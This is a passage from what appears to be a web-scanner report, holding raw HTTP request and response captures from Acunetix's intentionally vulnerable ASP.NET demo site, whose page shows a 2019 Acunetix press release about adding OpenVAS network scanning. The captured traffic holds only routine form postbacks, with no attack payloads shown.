ALIDATION=%2FwEWVwKP1p3RBAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH%2F%2FaNq1Q9scKgXRi5G
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22875
Response Body - size: 22,875 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 422 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10937 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,937 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgI